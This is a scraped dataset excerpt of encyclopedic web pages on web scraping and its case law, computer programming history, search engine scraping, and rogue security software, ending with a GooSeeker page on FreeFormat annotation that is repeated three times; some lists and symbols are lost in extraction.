between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
447 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_programming | Computer programming or coding is the composition of sequences of instructions, called programs, that computers can follow to perform tasks. 1 2 It involves designing and implementing algorithms, step-by-step specifications of procedures, by writing code in one or more programming languages. Programmers typically use high-level programming languages that are more easily intelligible to humans than machine code, which is directly executed by the central processing unit. Proficient programming usually requires expertise in several different subjects, including knowledge of the application domain, details of programming languages and generic code libraries, specialized algorithms, and formal logic. Auxiliary tasks accompanying and related to programming include analyzing requirements, testing, debugging (investigating and fixing problems), implementation of build systems, and management of derived artifacts, such as programs' machine code. While these are sometimes considered programming, often the term software development is used for this larger overall process with the terms programming, implementation, and coding reserved for the writing and editing of code per se. Sometimes software development is known as software engineering, especially when it employs formal methods or follows an engineering design process. Programmable devices have existed for centuries. As early as the 9th century, a programmable music sequencer was invented by the Persian Banu Musa brothers, who described an automated mechanical flute player in the Book of Ingenious Devices. 3 4 In 1206, the Arab engineer Al-Jazari invented a programmable drum machine where a musical mechanical automaton could be made to play different rhythms and drum patterns, via pegs and cams. 5 6 In 1801, the Jacquard loom could produce entirely different weaves by changing the "program" a series of pasteboard cards with holes punched in them. Code-breaking algorithms have also existed for centuries. In the 9th century, the Arab mathematician Al-Kindi described a cryptographic algorithm for deciphering encrypted code, in A Manuscript on Deciphering Cryptographic Messages. He gave the first description of cryptanalysis by frequency analysis, the earliest code-breaking algorithm. 7 The first computer program is generally dated to 1843 when mathematician Ada Lovelace published an algorithm to calculate a sequence of Bernoulli numbers, intended to be carried out by Charles Babbage's Analytical Engine. 8 However, Charles Babbage himself, wrote his first program for the AE in 1837. 9 10 In the 1880s, Herman Hollerith invented the concept of storing data in machine-readable form. 11 Later a control panel (plug board) added to his 1906 Type I Tabulator allowed it to be programmed for different jobs, and by the late 1940s, unit record equipment such as the IBM 602 and IBM 604, were programmed by control panels in a similar way, as were the first electronic computers. However, with the concept of the stored-program computer introduced in 1949, both programs and data were stored and manipulated in the same way in computer memory. 12 Machine code was the language of early programs, written in the instruction set of the particular machine, often in binary notation. Assembly languages were soon developed that let the programmer specify instructions in a text format (e.g., ADD X, TOTAL), with abbreviations for each operation code and meaningful names for specifying addresses. However, because an assembly language is little more than a different notation for a machine language, two machines with different instruction sets also have different assembly languages. High-level languages made the process of developing a program simpler and more understandable, and less bound to the underlying hardware. The first compiler related tool, the A 0 System, was developed in 1952 13 by Grace Hopper, who also coined the term 'compiler'. 14 15 FORTRAN, the first widely used high-level language to have a functional implementation, came out in 1957, 16 and many other languages were soon developed—in particular, COBOL aimed at commercial data processing, and Lisp for computer research. These compiled languages allow the programmer to write programs in terms that are syntactically richer, and more capable of abstracting the code, making it easy to target varying machine instruction sets via compilation declarations and heuristics. Compilers harnessed the power of computers to make programming easier 16 by allowing programmers to specify calculations by entering a formula using infix notation. Programs were mostly entered using punched cards or paper tape. By the late 1960s, data storage devices and computer terminals became inexpensive enough that programs could be created by typing directly into the computers. Text editors were also developed that allowed changes and corrections to be made much more easily than with punched cards. Whatever the approach to development may be, the final program must satisfy some fundamental properties. The following properties are among the most important: 17 18 Using automated tests and fitness functions can help to maintain some of the aforementioned attributes. 20 In computer programming, readability refers to the ease with which a human reader can comprehend the purpose, control flow, and operation of source code. It affects the aspects of quality above, including portability, usability and most importantly maintainability. Readability is important because programmers spend the majority of their time reading, trying to understand, reusing, and modifying existing source code, rather than writing new source code. Unreadable code often leads to bugs, inefficiencies, and duplicated code. A study found that a few simple readability transformations made code shorter and drastically reduced the time to understand it. 21 Following a consistent programming style often helps readability. However, readability is more than just programming style. Many factors, having little or nothing to do with the ability of the computer to efficiently compile and execute the code, contribute to readability. 22 Some of these factors include: The presentation aspects of this (such as indents, line breaks, color highlighting, and so on) are often handled by the source code editor, but the content aspects reflect the programmer's talent and skills. Various visual programming languages have also been developed with the intent to resolve readability concerns by adopting non-traditional approaches to code structure and display. Integrated development environments (IDEs) aim to integrate all such help. Techniques like Code refactoring can enhance readability. The academic field and the engineering practice of computer programming are both largely concerned with discovering and implementing the most efficient algorithms for a given class of problems. For this purpose, algorithms are classified into orders using the so-called Big O notation, which expresses resource use, such as execution time or memory consumption, in terms of the size of an input. Expert programmers are familiar with a variety of well-established algorithms and their respective complexities and use this knowledge to choose algorithms that are best suited to the circumstances. The first step in most formal software development processes is requirements analysis, followed by testing to determine value modeling, implementation, and failure elimination (debugging). There exist a lot of different approaches for each of those tasks. One approach popular for requirements analysis is Use Case analysis. Many programmers use forms of Agile software development where the various stages of formal software development are more integrated together into short cycles that take a few weeks rather than years. There are many approaches to the Software development process. Popular modeling techniques include Object-Oriented Analysis and Design (OOAD) and Model-Driven Architecture (MDA). The Unified Modeling Language (UML) is a notation used for both the OOAD and MDA. A similar technique used for database design is Entity-Relationship Modeling (ER Modeling). Implementation techniques include imperative languages (object-oriented or procedural), functional languages, and logic languages. It is very difficult to determine what are the most popular modern programming languages. Methods of measuring programming language popularity include: counting the number of job advertisements that mention the language, 23 the number of books sold and courses teaching the language (this overestimates the importance of newer languages), and estimates of the number of existing lines of code written in the language (this underestimates the number of users of business languages such as COBOL). Some languages are very popular for particular kinds of applications, while some languages are regularly used to write many different kinds of applications. For example, COBOL is still strong in corporate data centers 24 often on large mainframe computers, Fortran in engineering applications, scripting languages in Web development, and C in embedded software. Many applications use a mix of several languages in their construction and use. New languages are generally designed around the syntax of a prior language with new functionality added, (for example C adds object-orientation to C, and Java adds memory management and bytecode to C , but as a result, loses efficiency and the ability for low-level manipulation). Debugging is a very important task in the software development process since having defects in a program can have significant consequences for its users. Some languages are more prone to some kinds of faults because their specification does not require compilers to perform as much checking as other languages. Use of a static code analysis tool can help detect some possible problems. Normally the first step in debugging is to attempt to reproduce the problem. This can be a non-trivial task, for example as with parallel processes or some unusual software bugs. Also, specific user environment and usage history can make it difficult to reproduce the problem. After the bug is reproduced, the input of the program may need to be simplified to make it easier to debug. For example, when a bug in a compiler can make it crash when parsing some large source file, a simplification of the test case that results in only few lines from the original source file can be sufficient to reproduce the same crash. Trial-and-error divide-and-conquer is needed: the programmer will try to remove some parts of the original test case and check if the problem still exists. When debugging the problem in a GUI, the programmer can try to skip some user interaction from the original problem description and check if the remaining actions are sufficient for bugs to appear. Scripting and breakpointing are also part of this process. Debugging is often done with IDEs. Standalone debuggers like GDB are also used, and these often provide less of a visual environment, usually using a command line. Some text editors such as Emacs allow GDB to be invoked through them, to provide a visual environment. Different programming languages support different styles of programming (called programming paradigms). The choice of language used is subject to many considerations, such as company policy, suitability to task, availability of third-party packages, or individual preference. Ideally, the programming language best suited for the task at hand will be selected. Trade-offs from this ideal involve finding enough programmers who know the language to build a team, the availability of compilers for that language, and the efficiency with which programs written in a given language execute. Languages form an approximate spectrum from "low-level" to "high-level"; "low-level" languages are typically more machine-oriented and faster to execute, whereas "high-level" languages are more abstract and easier to use but execute less quickly. It is usually easier to code in "high-level" languages than in "low-level" ones. Programming languages are essential for software development. They are the building blocks for all software, from the simplest applications to the most sophisticated ones. Allen Downey, in his book How To Think Like A Computer Scientist, writes: Many computer languages provide a mechanism to call functions provided by shared libraries. Provided the functions in a library follow the appropriate run-time conventions (e.g., method of passing arguments), then these functions may be written in any other language. Computer programmers are those who write computer software. Their jobs usually involve: Although programming has been presented in the media as a somewhat mathematical subject, some research shows that good programmers have strong skills in natural human languages, and that learning to code is similar to learning a foreign language. 26 27 |
448 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Search_engine_scraping | Search engine scraping is the process of harvesting URLs, descriptions, or other information from search engines. This is a specific form of screen scraping or web scraping dedicated to search engines only. Most commonly larger search engine optimization (SEO) providers depend on regularly scraping keywords from search engines to monitor the competitive position of their customers' websites for relevant keywords or their indexing status. The process of entering a website and extracting data in an automated fashion is also often called "crawling". Search engines get almost all their data from automated crawling bots. Google is by far the largest search engine with most users in numbers as well as most revenue in creative advertisements, which makes Google the most important search engine to scrape for SEO related companies. 1 Although Google does not take legal action against scraping, it uses a range of defensive methods that makes scraping their results a challenging task, even when the scraping tool is realistically spoofing a normal web browser: When search engine defense thinks an access might be automated, the search engine can react differently. The first layer of defense is a captcha page 4 where the user is prompted to verify they are a real person and not a bot or tool. Solving the captcha will create a cookie that permits access to the search engine again for a while. After about one day, the captcha page is displayed again. The second layer of defense is a similar error page but without captcha, in such a case the user is completely blocked from using the search engine until the temporary block is lifted, or the user changes their IP. The third layer of defense is a long-term block of the entire network segment. Google has blocked large network blocks for months. This sort of block is likely triggered by an administrator and only happens if a scraping tool is sending a very high number of requests. All these forms of detection may also happen to a normal user, especially users sharing the same IP address or network class (IPV4 ranges as well as IPv6 ranges). To scrape a search engine successfully, the two major factors are time and amount. The more keywords a user needs to scrape and the smaller the time for the job, the more difficult scraping will be and the more developed a scraping script or tool needs to be. Scraping scripts need to overcome a few technical challenges: citation needed When developing a scraper for a search engine, almost any programming language can be used. Although, depending on performance requirements, some languages will be favorable. PHP is a commonly used language to write scraping scripts for websites or backend services, since it has powerful capabilities built-in (DOM parsers, libcURL); however, its memory usage is typically 10 times the factor of a similar C C code. Ruby on Rails as well as Python are also frequently used to automated scraping jobs. Additionally, bash scripting can be used together with cURL as a command line tool to scrape a search engine. When scraping websites and services the legal part is often a big concern for companies, for web scraping it greatly depends on the country a scraping user company is from as well as which data or website is being scraped. With many different court rulings all over the world. 5 6 However, when it comes to scraping search engines the situation is different, search engines usually do not list intellectual property as they just repeat or summarize information they scraped from other websites. The largest public known incident of a search engine being scraped happened in 2011 when Microsoft was caught scraping unknown keywords from Google for their own, rather new Bing service, 7 but even this incident did not result in a court case. |
449 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Rogue_security_software | Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. 1 It is a form of scareware that manipulates users through fear, and a form of ransomware. 2 Rogue security software has been a serious security threat in desktop computing since 2008. 3 An early example that gained infamy was SpySheriff and its clones, a such as Nava Shield. With the rise of cyber-criminals and a black market with thousands of organizations and individuals trading exploits, malware, virtual assets, and credentials, rogue security software has become one of the most lucrative criminal operations. Rogue security software mainly relies on social engineering (fraud) to defeat the security built into modern operating system and browser software and install itself onto victims' computers. 3 A website may, for example, display a fictitious warning dialog stating that someone's machine is infected with a computer virus, and encourage them through manipulation to install or purchase scareware in the belief that they are purchasing genuine antivirus software. Most have a Trojan horse component, which users are misled into installing. The Trojan may be disguised as: Some rogue security software, however, propagate onto users' computers as drive-by downloads which exploit security vulnerabilities in web browsers, PDF viewers, or email clients to install themselves without any manual interaction. 4 6 More recently, malware distributors have been utilizing SEO poisoning techniques by pushing infected URLs to the top of search engine results about recent news events. People looking for articles on such events on a search engine may encounter results that, upon being clicked, are instead redirected through a series of sites 7 before arriving at a landing page that says that their machine is infected and pushes a download to a "trial" of the rogue program. 8 9 A 2010 study by Google found 11,000 domains hosting fake anti-virus software, accounting for 50% of all malware delivered via internet advertising. 10 Cold-calling has also become a vector for distribution of this type of malware, with callers often claiming to be from "Microsoft Support" or another legitimate organization. 11 Black Hat search engine optimization (SEO) is a technique used to trick search engines into displaying malicious URLs in search results. The malicious webpages are filled with popular keywords in order to achieve a higher ranking in the search results. When the end user searches the web, one of these infected webpages is returned. Usually the most popular keywords from services such as Google Trends are used to generate webpages via PHP scripts placed on the compromised website. These PHP scripts will then monitor for search engine crawlers and feed them with specially crafted webpages that are then listed in the search results. Then, when the user searches for their keyword or images and clicks on the malicious link, they will be redirected to the Rogue security software payload. 12 13 Most websites usually employ third-party services for advertising on their webpages. If one of these advertising services is compromised, they may end up inadvertently infecting all of the websites using their service by advertising rogue security software. 13 Spam messages that include malicious attachments, links to binaries and drive-by download sites are another common mechanism for distributing rogue security software. Spam emails are often sent with content associated with typical day-to-day activities such as parcel deliveries, or taxation documents, designed to entice users to click on links or run attachments. When users succumb to these kinds of social engineering tricks they are quickly infected either directly via the attachment, or indirectly via a malicious website. This is known as a drive-by download. Usually in drive-by download attacks the malware is installed on the victim's machine without any interaction or awareness and occurs simply by visiting the website. 13 Once installed, the rogue security software may then attempt to entice the user into purchasing a service or additional software by: Developers of rogue security software may also entice people into purchasing their product by claiming to give a portion of their sales to a charitable cause. The rogue Green antivirus, for example, claims to donate $2 to an environmental care program for each sale made. Some rogue security software overlaps in function with scareware by also: Sanction by the FTC and the increasing effectiveness of anti-malware tools since 2006 have made it difficult for spyware and adware distribution networks—already complex to begin with 16 —to operate profitably. 17 Malware vendors have turned instead to the simpler, more profitable business model of rogue security software, which is targeted directly at users of desktop computers. 18 Rogue security software is often distributed through highly lucrative affiliate networks, in which affiliates supplied with Trojan kits for the software are paid a fee for every successful installation, and a commission from any resulting purchases. The affiliates then become responsible for setting up infection vectors and distribution infrastructure for the software. 19 An investigation by security researchers into the Antivirus XP 2008 rogue security software found just such an affiliate network, in which members were grossing commissions upwards of USD150,000 over 10 days, from tens of thousands of successful installations. 20 Despite its use of old-fashioned and somewhat unsophisticated techniques, rogue security software has become a significant security threat, due to the size of the impacted populations, the number of different variants that have been unleashed (over 250), and the profits that have been made for cyber-criminals (over $300,000 a month). 21 Law enforcement and legislation in all countries are slow to react to the appearance of rogue security software. In contrast, several private initiatives providing discussion forums and lists of dangerous products were founded soon after the appearance of the first rogue security software. Some reputable vendors, such as Kaspersky, 22 also began to provide lists of rogue security software. In 2005, the Anti-Spyware Coalition was founded, a coalition of anti-spyware software companies, academics, and consumer groups. Many of the private initiatives were initially informal discussions on general Internet forums, but some were started or even entirely carried out by individual people. The perhaps most famous and extensive one is the Spyware Warrior list of rogue suspect antispyware products and websites by Eric Howes, 23 which has however not been updated since May 2007. The website recommends checking the following websites for new rogue anti-spyware programs, most of which are not really new and are "simply re-branded clones and knockoffs of the same rogue applications that have been around for years. 24 In December 2008, the US District Court for Maryland—at the request of the FTC—issued a restraining order against Innovative Marketing Inc, a Kyiv-based firm producing and marketing the rogue security software products WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. 25 The company and its US-based web host, ByteHosting Internet Hosting Services LLC, had their assets frozen, were barred from using domain names associated with those products and any further advertisement or false representation. 26 Law enforcement has also exerted pressure on banks to shut down merchant gateways involved in processing rogue security software purchases. In some cases, the high volume of credit card chargebacks generated by such purchases has also prompted processors to take action against rogue security software vendors. 27 |
450 | https://en.wikipedia.org/wiki/Web_scraping | http://www.gooseeker.com/en/node/knowledgebase/freeformat | FreeFormat is an approach to semantically annotate Web pages. Instead of reauthoring the Web contents as Microformat does, the semantic annotations markups are managed in a standalone layer which is shared and collaboratively edited by Web users. On the Web, nearly all pages are authored with some kind of markup languages. The traditional markup tags are for presenting the contents on Web browsers. In order for software to automatically process the contents, additional metadata are neccessary to tell what about the contents. A few approaches emerged to convey semantics of the contents. Microformat, one major approach, seeks to re-use existing XHTML and HTML tags to convey metadata and other attributes. Despite Microformat is an open community, it is more like a standard body. A micoformat can be published by any community member, while it makes sense only when it is well accepted by enough members. It must take a considerable time to turn to be a facto standard. Unfortunately, the Web is booming up and cannot bear to wait for a new standard to be voted. Further more, after a microformat has been accepted as a facto standard, it costs too much to re-author the existing Web pages. In fact, each of the Web content authors are annotating the published contents with markup tags and attributes all the way. Most of the time, the annotations are for special presenting effects. For example, an author may annotate a content snippet with a special value of class, one of HTML attributes, to display it in a special background colour with the help of CSS. In fact, the special display effects always imply some semantics and try to make them more understandable. In summary, the existing annotations are valuable to be mined for semantics. Every authors annotate the published contents freely in some degree. There should be an approach to recognize and register the free semantic annotations. FreeFormat is just the one. FreeFormat mines the semantics from the free annotations and format them into semantic structures which are managed and hosted on the Internet. As a result, a metadata repository or a knowledge base is built up and acts as a semantics register center. All can published their own semantic structures for their contents, which can instruct 3rd party software to automatically process the contents. As the repository becomes larger and larger, it can be viewed as a semantic layer covering the underlying Web contents. FreeFormat, invented by GooSeeker, must be an effective approach to reformat the contents on the Web. MetaCamp server, implemented by GooSeeker, is a Web-based application managing the metadata repository and provide many collaborative tools to community members to share the semantic structures. MetaSeeker Toolkit V3.x has fully implemented FreeFormat. Please refer the release notes for detailed information. On the Web, nearly all pages are authored with some kind of markup languages. The traditional markup tags are for presenting the contents on Web browsers. In order for software to automatically process the contents, additional metadata are neccessary to tell what about the contents. A few approaches emerged to convey semantics of the contents. Microformat, one major approach, seeks to re-use existing XHTML and HTML tags to convey metadata and other attributes. Despite Microformat is an open community, it is more like a standard body. A micoformat can be published by any community member, while it makes sense only when it is well accepted by enough members. It must take a considerable time to turn to be a facto standard. Unfortunately, the Web is booming up and cannot bear to wait for a new standard to be voted. Further more, after a microformat has been accepted as a facto standard, it costs too much to re-author the existing Web pages. In fact, each of the Web content authors are annotating the published contents with markup tags and attributes all the way. Most of the time, the annotations are for special presenting effects. For example, an author may annotate a content snippet with a special value of class, one of HTML attributes, to display it in a special background colour with the help of CSS. In fact, the special display effects always imply some semantics and try to make them more understandable. In summary, the existing annotations are valuable to be mined for semantics. Every authors annotate the published contents freely in some degree. There should be an approach to recognize and register the free semantic annotations. FreeFormat is just the one. FreeFormat mines the semantics from the free annotations and format them into semantic structures which are managed and hosted on the Internet. As a result, a metadata repository or a knowledge base is built up and acts as a semantics register center. All can published their own semantic structures for their contents, which can instruct 3rd party software to automatically process the contents. As the repository becomes larger and larger, it can be viewed as a semantic layer covering the underlying Web contents. FreeFormat, invented by GooSeeker, must be an effective approach to reformat the contents on the Web. MetaCamp server, implemented by GooSeeker, is a Web-based application managing the metadata repository and provide many collaborative tools to community members to share the semantic structures. MetaSeeker Toolkit V3.x has fully implemented FreeFormat. Please refer the release notes for detailed information. On the Web, nearly all pages are authored with some kind of markup languages. The traditional markup tags are for presenting the contents on Web browsers. In order for software to automatically process the contents, additional metadata are neccessary to tell what about the contents. A few approaches emerged to convey semantics of the contents. Microformat, one major approach, seeks to re-use existing XHTML and HTML tags to convey metadata and other attributes. Despite Microformat is an open community, it is more like a standard body. A micoformat can be published by any community member, while it makes sense only when it is well accepted by enough members. It must take a considerable time to turn to be a facto standard. Unfortunately, the Web is booming up and cannot bear to wait for a new standard to be voted. Further more, after a microformat has been accepted as a facto standard, it costs too much to re-author the existing Web pages. In fact, each of the Web content authors are annotating the published contents with markup tags and attributes all the way. Most of the time, the annotations are for special presenting effects. For example, an author may annotate a content snippet with a special value of class, one of HTML attributes, to display it in a special background colour with the help of CSS. In fact, the special display effects always imply some semantics and try to make them more understandable. In summary, the existing annotations are valuable to be mined for semantics. Every authors annotate the published contents freely in some degree. There should be an approach to recognize and register the free semantic annotations. FreeFormat is just the one. FreeFormat mines the semantics from the free annotations and format them into semantic structures which are managed and hosted on the Internet. As a result, a metadata repository or a knowledge base is built up and acts as a semantics register center. All can published their own semantic structures for their contents, which can instruct 3rd party software to automatically process the contents. As the repository becomes larger and larger, it can be viewed as a semantic layer covering the underlying Web contents. FreeFormat, invented by GooSeeker, must be an effective approach to reformat the contents on the Web. MetaCamp server, implemented by GooSeeker, is a Web-based application managing the metadata repository and provide many collaborative tools to community members to share the semantic structures. MetaSeeker Toolkit V3.x has fully implemented FreeFormat. Please refer the release notes for detailed information. |
